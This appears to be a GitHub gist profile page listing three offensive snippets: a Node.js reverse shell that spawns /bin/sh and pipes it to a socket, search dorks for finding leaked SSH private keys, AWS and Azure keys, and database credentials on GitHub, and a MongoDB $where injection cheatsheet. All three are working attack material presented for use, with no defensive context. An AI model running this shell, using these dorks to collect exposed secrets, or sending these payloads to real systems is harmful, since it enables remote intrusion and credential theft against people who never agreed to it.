Skip to content

Instantly share code, notes, and snippets.

Avatar

Col Mack trickycdm

View GitHub Profile
View node-reverse-shell.js
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "127.0.0.1", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
View repo-snooping.md
inurl:“known_hosts”“ssh-rsa” 
Private encryption keys = site:github.com inurl:“id_rsa” -inurl:“pub” 
Test configuration info = site:github.com inurl:“test” filetype:config 
Ruby on Rails secure token = site:github.com inurl:secret_token.rb 
Windows Azure account keys = site:github.com “;AccountKey=” filetype:config 
Database connection config = site:github.com “;User Id=” filetype:config 
Amazon Web Service access key (Java) = site:github.com “AWS_ACCESS_KEY_ID” filetype:properties 
Amazon Web Service access key (Other) = site:github.com “AWS_ACCESS_KEY_ID” filetype:config
@trickycdm
trickycdm / mongodb-injection-cheatsheet.md
Last active Jul 4, 2017
Mongo Injection Cheatsheet
View mongodb-injection-cheatsheet.md

true, $where: '1 == 1'

, $where: '1 == 1'

$where: '1 == 1'

', $where: '1 == 1'

1, $where: '1 == 1'